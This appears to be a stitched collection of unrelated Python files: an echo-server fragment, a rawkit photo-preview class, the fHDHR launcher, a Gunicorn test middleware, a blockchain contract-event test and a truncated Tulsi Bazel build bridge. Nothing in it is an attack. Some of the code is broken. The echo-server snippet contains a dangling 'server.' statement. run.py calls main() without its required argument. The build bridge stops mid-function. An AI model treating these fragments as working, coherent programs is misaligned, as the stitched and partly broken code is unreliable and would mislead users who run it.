self.logger.debug('__init__')
SocketServer.TCPServer.__init__(self, server_address, handler_class)
return
def server_activate(self):
self.logger.debug('server_activate')
SocketServer.TCPServer.server_activate(self)
return
def serve_forever(self):
self.logger.debug('waiting for request')
self.logger.info('Handling requests, press <Ctrl-C> to quit')
while True:
self.handle_request()
return
def handle_request(self):
self.logger.debug('handle_request')
return SocketServer.TCPServer.handle_request(self)
def verify_request(self, request, client_address):
self.logger.debug('verify_request(%s, %s)', request, client_address)
return SocketServer.TCPServer.verify_request(self, request, client_address)
def process_request(self, request, client_address):
self.logger.debug('process_request(%s, %s)', request, client_address)
return SocketServer.TCPServer.process_request(self, request, client_address)
def server_close(self):
self.logger.debug('server_close')
return SocketServer.TCPServer.server_close(self)
def finish_request(self, request, client_address):
self.logger.debug('finish_request(%s, %s)', request, client_address)
return SocketServer.TCPServer.finish_request(self, request, client_address)
def close_request(self, request_address):
self.logger.debug('close_request(%s)', request_address)
return SocketServer.TCPServer.close_request(self, request_address)
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 50000) # let the kernel give us a port
server = EchoServer(address, EchoRequestHandler)
ip, port = server.server_address # find out what port we were given
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
while True:
time.sleep(1000)
server.
## logger = logging.getLogger('client')
## logger.info('Server on %s:%s', ip, port)
##
## # Connect to the server
## logger.debug('creating socket')
## s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
## logger.debug('connecting to server')
## s.connect((ip, port))
##
## # Send the data
## message = 'Hello, world'
## logger.debug('sending data: "%s"', message)
## len_sent = s.send(message)
##
## # Receive a response
## logger.debug('waiting for response')
## response = s.recv(len_sent)
## logger.debug('response from server: "%s"', response)
##
## # Clean up
## logger.debug('closing socket')
## s.close()
## logger.debug('done')
## server.socket.close()
|
photo.py
|
import os
import tempfile
import threading
from gi.repository import Gdk
from rawkit.options import Options
from rawkit.raw import Raw
class AutoUpdatingOptions(Options):
"""
A set of options that update the photo when they are updated.
"""
def __init__(self, attrs=None, photo=None):
super().__init__(attrs=attrs)
self.photo = photo
def __setattr__(self, name, value):
try:
Options.__setattr__(self, name, value)
self.update()
except AttributeError:
self.__dict__['name'] = value
def update(self):
"""
Updates the photo which contains these options.
"""
if self.photo is not None:
self.photo.update()
class Photo(Raw):
"""
A photo comprises a raw file which can be edited and will update the
associated preview window (if any).
"""
def __init__(self, filename=None, ui_thread=None):
super().__init__(filename=filename)
(self.fhandle, self.tempfile) = tempfile.mkstemp()
self.filename = filename
self.ui_thread = ui_thread
self._closed = False
if self.ui_thread is not None:
self.update()
self.show()
def __setattr__(self, name, value):
if name == 'options' and type(value) is Options:
self.__dict__['options'] = AutoUpdatingOptions(
attrs=dict(zip(
value.keys(),
value.values()
)),
photo=self
)
try:
self.update()
except AttributeError:
pass
else:
Raw.__setattr__(self, name, value)
def show(self):
"""
Show the preview window.
"""
try:
Gdk.threads_enter()
self.preview = self.ui_thread.open_window(
self.tempfile,
rawfile=self.filename
)
finally:
Gdk.threads_leave()
def _update(self):
try:
Gdk.threads_enter()
self.save(filename=self.tempfile, filetype='ppm')
self.preview.render_photo(filename=self.tempfile)
except AttributeError:
pass
finally:
Gdk.threads_leave()
def update(self):
"""
Updates the photo on disk and in the preview pane.
"""
t = threading.Thread(target=self._update)
t.daemon = True
t.start()
@property
def closed(self):
return self._closed
def close(self):
"""
Cleans up the underlying raw file and unlinks any temp files.
"""
if not self.closed:
super().close()
os.unlink(self.tempfile)
self.preview.close()
self._closed = True
|
run.py
|
import os
import sys
import argparse
import time
import multiprocessing
import platform
from fHDHR import fHDHR_VERSION, fHDHR_OBJ
import fHDHR.exceptions
import fHDHR.config
from fHDHR.http import fHDHR_HTTP_Server
from fHDHR.db import fHDHRdb
ERR_CODE = 1
ERR_CODE_NO_RESTART = 2
if sys.version_info.major == 2 or sys.version_info < (3, 7):
print('Error: fHDHR requires python 3.7+.')
sys.exit(1)
opersystem = platform.system()
if opersystem in ["Windows"]:
print("WARNING: This script may fail on Windows.")
def build_args_parser():
"""Build argument parser for fHDHR"""
parser = argparse.ArgumentParser(description='fHDHR')
parser.add_argument('-c', '--config', dest='cfg', type=str, required=True, help='configuration file to load.')
return parser.parse_args()
def get_configuration(args, script_dir):
if not os.path.isfile(args.cfg):
raise fHDHR.exceptions.ConfigurationNotFound(filename=args.cfg)
return fHDHR.config.Config(args.cfg, script_dir)
def run(settings, logger, db):
fhdhr = fHDHR_OBJ(settings, logger, db)
fhdhrweb = fHDHR_HTTP_Server(fhdhr)
# Ensure spawn on Windows instead of fork
if settings.dict["main"]["opersystem"] in ["Windows"]:
multiprocessing.set_start_method('spawn')
try:
print("HTTP Server Starting")
fhdhr_web = multiprocessing.Process(target=fhdhrweb.run)
fhdhr_web.start()
if settings.dict["fhdhr"]["discovery_address"]:
print("SSDP Server Starting")
fhdhr_ssdp = multiprocessing.Process(target=fhdhr.device.ssdp.run)
fhdhr_ssdp.start()
if settings.dict["epg"]["method"]:
print("EPG Update Starting")
fhdhr_epg = multiprocessing.Process(target=fhdhr.device.epg.run)
fhdhr_epg.start()
# wait forever
while True:
time.sleep(3600)
except KeyboardInterrupt:
return ERR_CODE_NO_RESTART
return ERR_CODE
def start(args, script_dir):
"""Get Configuration for fHDHR and start"""
try:
settings = get_configuration(args, script_dir)
except fHDHR.exceptions.ConfigurationError as e:
print(e)
return ERR_CODE_NO_RESTART
logger = settings.logging_setup()
db = fHDHRdb(settings)
return run(settings, logger, db)
def main(script_dir):
"""fHDHR run script entry point"""
print("Loading fHDHR " + fHDHR_VERSION)
try:
args = build_args_parser()
return start(args, script_dir)
except KeyboardInterrupt:
print("\n\nInterrupted")
return ERR_CODE
if __name__ == '__main__':
main()
|
middleware.py
|
from multiprocessing import Process, Queue
import requests
import gevent
def child_process(queue):
while True:
print(queue.get())
requests.get('http://requestb.in/15s95oz1')
class GunicornSubProcessTestMiddleware(object):
def __init__(self):
super(GunicornSubProcessTestMiddleware, self).__init__()
self.queue = Queue()
self.process = Process(target=child_process, args=(self.queue,))
self.process.start()
def process_request(self, request):
self.queue.put(('REQUEST',))
def process_response(self, request, response):
self.queue.put(('RESPONSE',response.status_code))
return response
|
eqpay_transaction_receipt_origin_contract_address.py
|
#!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
import threading
def waitforlogs(node, contract_address):
logs = node.cli.waitforlogs(node.cli.getblockcount()-1, COINBASE_MATURITY+500, '{"addresses": ["'+contract_address+'"]}')
node.result = logs
class EqPayTransactionReceiptOriginContractAddressTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-logevents', '-txindex']]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.node = self.nodes[0]
self.nodes[0].generate(10 + COINBASE_MATURITY)
"""
pragma solidity ^0.5.2;
contract Test {
event TestEvent();
address private child;
function setChildContract(address childContractAddress) external {
child = childContractAddress;
}
function doEvent() external {
if(child == address(0x0)) {
emit TestEvent();
} else {
Test(child).doEvent();
}
}
function getChildAddress() public view returns(address) {
return child;
}
}
"""
"""
Function signatures:
afd67ce7: doEvent()
bcb1c3a9: getChildAddress()
f8d86e18: setChildContract(address)
"""
# Set up a chain of 10 contracts that reference their child contract. I.e. the tenth contract is the leaf
contracts = []
contract_bytecode = "608060405234801561001057600080fd5b506102b8806100206000396000f3fe608060405234801561001057600080fd5b506004361061005e576000357c010000000000000000000000000000000000000000000000000000000090048063afd67ce714610063578063bcb1c3a91461006d578063f8d86e18146100b7575b600080fd5b61006b6100fb565b005b610075610220565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b6100f9600480360360208110156100cd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610249565b005b600073ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610182577f24ec1d3ff24c2f6ff210738839dbc339cd45a5294d85c79361016243157aae7b60405160405180910390a161021e565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663afd67ce76040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15801561020757600080fd5b5060325a03f115801561021957600080fd5b505050505b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505056fea165627a7a723058203cf61a18e40f6e2bd01b2f7bd607c6e6aff032f12bd5e3eca68212d2e2c80dbf0029"
for i in range(10):
contracts.append(self.nodes[0].createcontract(contract_bytecode)['address'])
self.node.generate(1)
if len(contracts) > 1:
self.node.sendtocontract(contracts[-2], "f8d86e18" + (contracts[-1].zfill(64)), 0, 1000000)
self.node.generate(1)
# Run the doEvent function recursively starting at the root contract and make sure that no event entries is in the returndata for waitforlogs for the first 9 contracts
for contract_address in contracts[:-1]:
thread = threading.Thread(target=waitforlogs, args=(self.node, contract_address))
thread.start()
txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
self.node.generate(7)
thread.join()
receipt = self.node.gettransactionreceipt(txid)
assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
assert_equal(len(self.node.result['entries']), 0)
# Do the same thing again but make sure that the event triggers for the "leaf" (10th) contract
thread = threading.Thread(target=waitforlogs, args=(self.node, contracts[-1]))
thread.start()
txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
self.node.generate(7)
thread.join()
receipt = self.node.gettransactionreceipt(txid)
assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
assert_equal(len(self.node.result['entries']), 1)
if __name__ == '__main__':
EqPayTransactionReceiptOriginContractAddressTest().main()
|
bazel_build.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2016 The Tulsi Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bridge between Xcode and Bazel for the "build" action."""
import atexit
import errno
import fcntl
import inspect
import io
import json
import os
import pipes
import re
import shutil
import signal
import subprocess
import sys
import textwrap
import threading
import time
import zipfile
from apfs_clone_copy import CopyOnWrite
import bazel_build_events
import bazel_build_settings
import bazel_options
from bootstrap_lldbinit import BootstrapLLDBInit
from bootstrap_lldbinit import TULSI_LLDBINIT_FILE
import tulsi_logging
from update_symbol_cache import UpdateSymbolCache
# List of frameworks that Xcode injects into test host targets that should be
# re-signed when running the tests on devices.
XCODE_INJECTED_FRAMEWORKS = [
'libXCTestBundleInject.dylib',
'IDEBundleInjection.framework',
'XCTAutomationSupport.framework',
'XCTest.framework',
]
_logger = None
def _PrintUnbuffered(msg):
sys.stdout.write('%s\n' % msg)
sys.stdout.flush()
def _PrintXcodeWarning(msg):
sys.stdout.write(':: warning: %s\n' % msg)
sys.stdout.flush()
def _PrintXcodeError(msg):
sys.stderr.write(':: error: %s\n' % msg)
sys.stderr.flush()
def _Fatal(msg, fatal_frame=None):
"""Print a fatal error pointing to the failure line inside the script."""
if not fatal_frame:
fatal_frame = inspect.currentframe().f_back
filename, line_number, _, _, _ = inspect.getframeinfo(fatal_frame)
_PrintUnbuffered('%s:%d: error: %s' % (os.path.abspath(filename),
line_number, msg))
CLEANUP_BEP_FILE_AT_EXIT = False
# Function to be called atexit to clean up the BEP file if one is present.
# This is especially useful in cases of abnormal termination (such as what
# happens when Xcode is killed).
def _BEPFileExitCleanup(bep_file_path):
if not CLEANUP_BEP_FILE_AT_EXIT:
return
try:
os.remove(bep_file_path)
except OSError as e:
_PrintXcodeWarning('Failed to remove BEP file from %s. Error: %s' %
(bep_file_path, e.strerror))
def _InterruptHandler(signum, frame):
"""Gracefully exit on SIGINT."""
del signum, frame # Unused.
_PrintUnbuffered('Caught interrupt signal. Exiting...')
sys.exit(0)
class Timer(object):
"""Simple profiler."""
def __init__(self, action_name, action_id):
"""Creates a new Timer object.
Args:
action_name: A human-readable action name, shown in the build log.
action_id: A machine-readable action identifier, can be used for metrics.
Returns:
A Timer instance.
Raises:
RuntimeError: if Timer is created without initializing _logger.
"""
if _logger is None:
raise RuntimeError('Attempted to create Timer without a logger.')
self.action_name = action_name
self.action_id = action_id
self._start = None
def Start(self):
self._start = time.time()
return self
def End(self, log_absolute_times=False):
end = time.time()
seconds = end - self._start
if log_absolute_times:
_logger.log_action(self.action_name, self.action_id, seconds,
self._start, end)
else:
_logger.log_action(self.action_name, self.action_id, seconds)
# Function to be called atexit to release the file lock on script termination.
def _LockFileExitCleanup(lock_file_handle):
lock_file_handle.close()
def _LockFileAcquire(lock_path):
"""Force script to wait on global file lock to serialize build target actions.
Args:
lock_path: Path to the lock file.
"""
_PrintUnbuffered('Queuing Tulsi build...')
# TODO(b/69414272): See if we can improve this for multiple WORKSPACEs.
lockfile = open(lock_path, 'w')
# Register "fclose(...)" as early as possible, before acquiring lock.
atexit.register(_LockFileExitCleanup, lockfile)
while True:
try:
fcntl.lockf(lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as err:
if err.errno != errno.EAGAIN:
raise
else:
time.sleep(0.1)
class CodesignBundleAttributes(object):
"""Wrapper class for codesigning attributes of a signed bundle."""
# List of codesigning attributes that this script requires.
_ATTRIBUTES = ['Authority', 'Identifier', 'TeamIdentifier']
def __init__(self, codesign_output):
self.attributes = {}
pending_attributes = list(self._ATTRIBUTES)
for line in codesign_output.split('\n'):
if not pending_attributes:
break
for attribute in pending_attributes:
if line.startswith(attribute):
value = line[len(attribute) + 1:]
self.attributes[attribute] = value
pending_attributes.remove(attribute)
break
for attribute in self._ATTRIBUTES:
if attribute not in self.attributes:
_PrintXcodeError(
'Failed to extract %s from %s.\n' % (attribute, codesign_output))
def Get(self, attribute):
"""Returns the value for the given attribute, or None if it wasn't found."""
value = self.attributes.get(attribute)
if attribute not in self._ATTRIBUTES:
_PrintXcodeError(
'Attribute %s not declared to be parsed. ' % attribute +
'Available attributes are %s.\n' % self._ATTRIBUTES)
return value
class _OptionsParser(object):
"""Handles parsing script options."""
# List of all supported Xcode configurations.
KNOWN_CONFIGS = ['Debug', 'Release']
def __init__(self, build_settings, sdk_version, platform_name, arch):
self.targets = []
self.build_settings = build_settings
self.common_build_options = [
'--verbose_failures',
'--bes_outerr_buffer_size=0', # Don't buffer Bazel output.
]
self.sdk_version = sdk_version
self.platform_name = platform_name
if self.platform_name.startswith('watch'):
config_platform = 'watchos'
elif self.platform_name.startswith('iphone'):
config_platform = 'ios'
elif self.platform_name.startswith('macos'):
config_platform = 'macos'
elif self.platform_name.startswith('appletv'):
config_platform = 'tvos'
else:
self._WarnUnknownPlatform()
config_platform = 'ios'
self.bazel_build_config = '{}_{}'.format(config_platform, arch)
if self.bazel_build_config not in build_settings.platformConfigFlags:
_PrintXcodeError('Unknown active compilation target of "{}". '
'Please report a Tulsi bug.'
.format(self.bazel_build_config))
sys.exit(1)
self.verbose = 0
self.bazel_bin_path = 'bazel-bin'
self.bazel_executable = None
@staticmethod
def _UsageMessage():
"""Returns a usage message string."""
usage = textwrap.dedent("""\
Usage: %s <target> [<target2> ...] --bazel <bazel_binary_path> [options]
Where options are:
--verbose [-v]
Increments the verbosity of the script by one level. This argument
may be provided multiple times to enable additional output levels.
--bazel_bin_path <path>
Path at which Bazel-generated artifacts may be retrieved.
""" % sys.argv[0])
return usage
def ParseOptions(self, args):
"""Parses arguments, returning (message, exit_code)."""
bazel_executable_index = args.index('--bazel')
self.targets = args[:bazel_executable_index]
if not self.targets or len(args) < bazel_executable_index + 2:
return (self._UsageMessage(), 10)
self.bazel_executable = args[bazel_executable_index + 1]
return self._ParseVariableOptions(args[bazel_executable_index + 2:])
def GetBaseFlagsForTargets(self, config):
is_debug = config == 'Debug'
return self.build_settings.flags_for_target(
self.targets[0],
is_debug,
self.bazel_build_config)
def GetEnabledFeatures(self):
"""Returns a list of enabled Bazel features for the active target."""
return self.build_settings.features_for_target(self.targets[0])
def GetBazelOptions(self, config):
"""Returns the full set of build options for the given config."""
bazel, start_up, build = self.GetBaseFlagsForTargets(config)
all_build = []
all_build.extend(self.common_build_options)
all_build.extend(build)
xcode_version_flag = self._ComputeXcodeVersionFlag()
if xcode_version_flag:
all_build.append('--xcode_version=%s' % xcode_version_flag)
return bazel, start_up, all_build
def _WarnUnknownPlatform(self):
_PrintUnbuffered('Warning: unknown platform "%s" will be treated as '
'iOS' % self.platform_name)
def _ParseVariableOptions(self, args):
"""Parses flag-based args, returning (message, exit_code)."""
verbose_re = re.compile('-(v+)$')
while args:
arg = args[0]
args = args[1:]
if arg == '--bazel_bin_path':
if not args:
return ('Missing required parameter for %s' % arg, 2)
self.bazel_bin_path = args[0]
args = args[1:]
elif arg == '--verbose':
self.verbose += 1
else:
match = verbose_re.match(arg)
if match:
self.verbose += len(match.group(1))
else:
return ('Unknown option "%s"\n%s' % (arg, self._UsageMessage()), 1)
return (None, 0)
@staticmethod
def _GetXcodeBuildVersionString():
"""Returns Xcode build version from the environment as a string."""
return os.environ['XCODE_PRODUCT_BUILD_VERSION']
@staticmethod
def _GetXcodeVersionString():
"""Returns Xcode version info from the environment as a string."""
reported_version = os.environ['XCODE_VERSION_ACTUAL']
match = re.match(r'(\d{2})(\d)(\d)$', reported_version)
if not match:
_PrintUnbuffered('Warning: Failed to extract Xcode version from %s' % (
reported_version))
return None
major_version = int(match.group(1))
minor_version = int(match.group(2))
fix_version = int(match.group(3))
return '%d.%d.%d' % (major_version, minor_version, fix_version)
@staticmethod
def _ComputeXcodeVersionFlag():
"""Returns a string for the --xcode_version build flag, if any.
The flag should be used if the active Xcode version was not the same one
used during project generation.
Note this a best-attempt only; this may not be accurate as Bazel itself
caches the active DEVELOPER_DIR path and the user may have changed their
installed Xcode version.
"""
xcode_version = _OptionsParser._GetXcodeVersionString()
build_version = _OptionsParser._GetXcodeBuildVersionString()
if not xcode_version or not build_version:
return None
# Of the form Major.Minor.Fix.Build (new Bazel form) or Major.Min.Fix (old).
full_bazel_version = os.environ.get('TULSI_XCODE_VERSION')
if not full_bazel_version: # Unexpected: Tulsi gen didn't set the flag.
return xcode_version
# Newer Bazel versions specify the version as Major.Minor.Fix.Build.
if full_bazel_version.count('.') == 3:
components = full_bazel_version.rsplit('.', 1)
bazel_xcode_version = components[0]
bazel_build_version = components[1]
if (xcode_version != bazel_xcode_version
or build_version != bazel_build_version):
return '{}.{}'.format(xcode_version, build_version)
else:
return None
else: # Old version of Bazel. We need to use form Major.Minor.Fix.
return xcode_version if xcode_version != full_bazel_version else None
class BazelBuildBridge(object):
"""Handles invoking Bazel and unpacking generated binaries."""
BUILD_EVENTS_FILE = 'build_events.json'
def __init__(self, build_settings):
self.build_settings = build_settings
self.verbose = 0
self.build_path = None
self.bazel_bin_path = None
self.codesign_attributes = {}
self.codesigning_folder_path = os.environ['CODESIGNING_FOLDER_PATH']
self.xcode_action = os.environ['ACTION'] # The Xcode build action.
# When invoked as an external build system script, Xcode will set ACTION to
# an empty string.
if not self.xcode_action:
self.xcode_action = 'build'
if int(os.environ['XCODE_VERSION_MAJOR']) < 900:
xcode_build_version = os.environ['XCODE_PRODUCT_BUILD_VERSION']
_PrintXcodeWarning('Tulsi officially supports Xcode 9+. You are using an '
'earlier Xcode, build %s.' % xcode_build_version)
self.tulsi_version = os.environ.get('TULSI_VERSION', 'UNKNOWN')
# TODO(b/69857078): Remove this when wrapped_clang is updated.
self.direct_debug_prefix_map = False
self.normalized_prefix_map = False
self.update_symbol_cache = UpdateSymbolCache()
# Target architecture. Must be defined for correct setting of
# the --cpu flag. Note that Xcode will set multiple values in
# ARCHS when building for a Generic Device.
archs = os.environ.get('ARCHS')
if not archs:
_PrintXcodeError('Tulsi requires env variable ARCHS to be '
'set. Please file a bug against Tulsi.')
sys.exit(1)
self.arch = archs.split()[-1]
# Path into which generated artifacts should be copied.
self.built_products_dir = os.environ['BUILT_PRODUCTS_DIR']
# Path where Xcode expects generated sources to be placed.
self.derived_sources_folder_path = os.environ.get('DERIVED_SOURCES_DIR')
# Full name of the target artifact (e.g., "MyApp.app" or "Test.xctest").
self.full_product_name = os.environ['FULL_PRODUCT_NAME']
# Whether to generate runfiles for this target.
self.gen_runfiles = os.environ.get('GENERATE_RUNFILES')
# Target SDK version.
self.sdk_version = os.environ.get('SDK_VERSION')
# TEST_HOST for unit tests.
self.test_host_binary = os.environ.get('TEST_HOST')
# Whether this target is a test or not.
self.is_test = os.environ.get('WRAPPER_EXTENSION') == 'xctest'
# Target platform.
self.platform_name = os.environ['PLATFORM_NAME']
# Type of the target artifact.
self.product_type = os.environ['PRODUCT_TYPE']
# Path to the parent of the xcodeproj bundle.
self.project_dir = os.environ['PROJECT_DIR']
# Path to the xcodeproj bundle.
self.project_file_path = os.environ['PROJECT_FILE_PATH']
# Path to the directory containing the WORKSPACE file.
self.workspace_root = os.path.abspath(os.environ['TULSI_WR'])
# Set to the name of the generated bundle for bundle-type targets, None for
# single file targets (like static libraries).
self.wrapper_name = os.environ.get('WRAPPER_NAME')
self.wrapper_suffix = os.environ.get('WRAPPER_SUFFIX', '')
# Path where Xcode expects the artifacts to be written to. This is not the
# codesigning_path as device vs simulator builds have different signing
# requirements, so Xcode expects different paths to be signed. This is
# mostly apparent on XCUITests where simulator builds set the codesigning
# path to be the .xctest bundle, but for device builds it is actually the
# UI runner app (since it needs to be codesigned to run on the device.) The
# FULL_PRODUCT_NAME variable is a stable path on where to put the expected
# artifacts. For static libraries (objc_library, swift_library),
# FULL_PRODUCT_NAME corresponds to the .a file name, which coincides with
# the expected location for a single artifact output.
# TODO(b/35811023): Check these paths are still valid.
self.artifact_output_path = os.path.join(
os.environ['TARGET_BUILD_DIR'],
os.environ['FULL_PRODUCT_NAME'])
# Path to where Xcode expects the binary to be placed.
self.binary_path = os.path.join(
os.environ['TARGET_BUILD_DIR'], os.environ['EXECUTABLE_PATH'])
self.is_simulator = self.platform_name.endswith('simulator')
# Check to see if code signing actions should be skipped or not.
if self.is_simulator:
self.codesigning_allowed = False
else:
self.codesigning_allowed = os.environ.get('CODE_SIGNING_ALLOWED') == 'YES'
if self.codesigning_allowed:
platform_prefix = 'iOS'
if self.platform_name.startswith('macos'):
platform_prefix = 'macOS'
entitlements_filename = '%sXCTRunner.entitlements' % platform_prefix
self.runner_entitlements_template = os.path.join(self.project_file_path,
'.tulsi',
'Resources',
entitlements_filename)
self.bazel_executable = None
def Run(self, args):
"""Executes a Bazel build based on the environment and given arguments."""
if self.xcode_action != 'build':
sys.stderr.write('Xcode action is %s, ignoring.' % self.xcode_action)
return 0
parser = _OptionsParser(self.build_settings,
self.sdk_version,
self.platform_name,
self.arch)
timer = Timer('Parsing options', 'parsing_options').Start()
message, exit_code = parser.ParseOptions(args[1:])
timer.End()
if exit_code:
_PrintXcodeError('Option parsing failed: %s' % message)
return exit_code
self.verbose = parser.verbose
self.bazel_bin_path = os.path.abspath(parser.bazel_bin_path)
self.bazel_executable = parser.bazel_executable
self.bazel_exec_root = self.build_settings.bazelExecRoot
# Update feature flags.
features = parser.GetEnabledFeatures()
self.direct_debug_prefix_map = 'DirectDebugPrefixMap' in features
self.normalized_prefix_map = 'DebugPathNormalization' in features
self.build_path = os.path.join(self.bazel_bin_path,
os.environ.get('TULSI_BUILD_PATH', ''))
# Path to the Build Events JSON file uses pid and is removed if the
# build is successful.
filename = '%d_%s' % (os.getpid(), BazelBuildBridge.BUILD_EVENTS_FILE)
self.build_events_file_path = os.path.join(
self.project_file_path,
'.tulsi',
filename)
(command, retval) = self._BuildBazelCommand(parser)
if retval:
return retval
timer = Timer('Running Bazel', 'running_bazel').Start()
exit_code, outputs = self._RunBazelAndPatchOutput(command)
timer.End()
if exit_code:
_Fatal('Bazel build failed with exit code %d. Please check the build '
'log in Report Navigator (⌘9) for more information.'
% exit_code)
return exit_code
post_bazel_timer = Timer('Total Tulsi Post-Bazel time', 'total_post_bazel')
post_bazel_timer.Start()
if not os.path.exists(self.bazel_exec_root):
_Fatal('No Bazel execution root was found at %r. Debugging experience '
'will be compromised. Please report a Tulsi bug.'
% self.bazel_exec_root)
return 404
# This needs to run after `bazel build`, since it depends on the Bazel
# workspace directory
exit_code = self._LinkTulsiWorkspace()
if exit_code:
return exit_code
exit_code, outputs_data = self._ExtractAspectOutputsData(outputs)
if exit_code:
return exit_code
# Generated headers are installed on a thread since we are launching
# a separate process to do so. This gives us clean timings.
install_thread = threading.Thread(
target=self._InstallGeneratedHeaders, args=(outputs,))
install_thread.start()
timer = Timer('Installing artifacts', 'installing_artifacts').Start()
exit_code = self._InstallArtifact(outputs_data)
timer.End()
install_thread.join()
if exit_code:
return exit_code
exit_code, dsym_paths = self._InstallDSYMBundles(
self.built_products_dir, outputs_data)
if exit_code:
return exit_code
if not dsym_paths:
# Clean any bundles from a previous build that can interfere with
# debugging in LLDB.
self._CleanExistingDSYMs()
else:
for path in dsym_paths:
# Starting with Xcode 9.x, a plist based remapping exists for dSYM
# bundles that works with Swift as well as (Obj-)C(++).
#
# This solution also works for Xcode 8.x for (Obj-)C(++) but not
# for Swift.
timer = Timer('Adding remappings as plists to dSYM',
'plist_dsym').Start()
exit_code = self._PlistdSYMPaths(path)
timer.End()
if exit_code:
_PrintXcodeError('Remapping dSYMs process returned %i, please '
'report a Tulsi bug and attach a full Xcode '
'build log.' % exit_code)
return exit_code
# Starting with Xcode 7.3, XCTests inject several supporting frameworks
# into the test host that need to be signed with the same identity as
# the host itself.
if (self.is_test and not self.platform_name.startswith('macos') and
self.codesigning_allowed):
exit_code = self._ResignTestArtifacts()
if exit_code:
return exit_code
# Starting with Xcode 8, .lldbinit files are honored during Xcode debugging
# sessions. This allows use of the target.source-map field to remap the
# debug symbol paths encoded in the binary to the paths expected by Xcode.
#
# This will not work with dSYM bundles, or a direct -fdebug-prefix-map from
# the Bazel-built locations to Xcode-visible sources.
timer = Timer('Updating .lldbinit', 'updating_lldbinit').Start()
clear_source_map = dsym_paths or self.direct_debug_prefix_map
exit_code = self._UpdateLLDBInit(clear_source_map)
timer.End()
if exit_code:
_PrintXcodeWarning('Updating .lldbinit action failed with code %d' %
exit_code)
post_bazel_timer.End(log_absolute_times=True)
return 0
def _BuildBazelCommand(self, options):
"""Builds up a commandline string suitable for running Bazel."""
configuration = os.environ['CONFIGURATION']
# Treat the special testrunner build config as a Debug compile.
test_runner_config_prefix = '__TulsiTestRunner_'
if configuration.startswith(test_runner_config_prefix):
configuration = configuration[len(test_runner_config_prefix):]
elif os.environ.get('TULSI_TEST_RUNNER_ONLY') == 'YES':
_PrintXcodeError('Building test targets with configuration "%s" is not '
'allowed. Please use the "Test" action or "Build for" > '
'"Testing" instead.' % configuration)
return (None, 1)
if configuration not in _OptionsParser.KNOWN_CONFIGS:
_PrintXcodeError('Unknown build configuration "%s"' % configuration)
return (None, 1)
bazel, start_up, build = options.GetBazelOptions(configuration)
bazel_command = [bazel]
bazel_command.extend(start_up)
bazel_command.append('build')
bazel_command.extend(build)
bazel_command.extend([
# The following flags are used by Tulsi to identify itself and read
# build information from Bazel. They shold not affect Bazel anaylsis
# caching.
'--tool_tag=tulsi_v%s:bazel_build' % self.tulsi_version,
'--build_event_json_file=%s' % self.build_events_file_path,
'--noexperimental_build_event_json_file_path_conversion',
'--aspects', '@tulsi//:tulsi/tulsi_aspects.bzl%tulsi_outputs_aspect'])
if self.is_test and self.gen_runfiles:
bazel_command.append('--output_groups=+tulsi_outputs')
else:
bazel_command.append('--output_groups=tulsi_outputs,default')
bazel_command.extend(options.targets)
extra_options = bazel_options.BazelOptions(os.environ)
bazel_command.extend(extra_options.bazel_feature_flags())
return (bazel_command, 0)
def _RunBazelAndPatchOutput(self, command):
"""Runs subprocess command, patching output as it's received."""
self._PrintVerbose('Running "%s", patching output for workspace root at '
'"%s" with project path at "%s".' %
(' '.join([pipes.quote(x) for x in command]),
self.workspace_root,
self.project_dir))
# Xcode translates anything that looks like ""<path>:<line>:" that is not
# followed by the word "warning" into an error. Bazel warnings and debug
# messages do not fit this scheme and must be patched here.
bazel_warning_line_regex = re.compile(
r'(?:DEBUG|WARNING): ([^:]+:\d+:(?:\d+:)?)\s+(.+)')
def PatchBazelWarningStatements(output_line):
match = bazel_warning_line_regex.match(output_line)
if match:
output_line = '%s warning: %s' % (match.group(1), match.group(2))
return output_line
patch_xcode_parsable_line = PatchBazelWarningStatements
if self.workspace_root != self.project_dir:
# Match (likely) filename:line_number: lines.
xcode_parsable_line_regex = re.compile(r'([^/][^:]+):\d+:')
def PatchOutputLine(output_line):
output_line = PatchBazelWarningStatements(output_line)
if xcode_parsable_line_regex.match(output_line):
output_line = '%s/%s' % (self.workspace_root, output_line)
return output_line
patch_xcode_parsable_line = PatchOutputLine
def HandleOutput(output):
for line in output.splitlines():
_logger.log_bazel_message(patch_xcode_parsable_line(line))
def WatcherUpdate(watcher):
"""Processes any new events in the given watcher.
Args:
watcher: a BazelBuildEventsWatcher object.
Returns:
A list of new tulsiout file names seen.
"""
new_events = watcher.check_for_new_events()
new_outputs = []
for build_event in new_events:
if build_event.stderr:
HandleOutput(build_event.stderr)
if build_event.stdout:
HandleOutput(build_event.stdout)
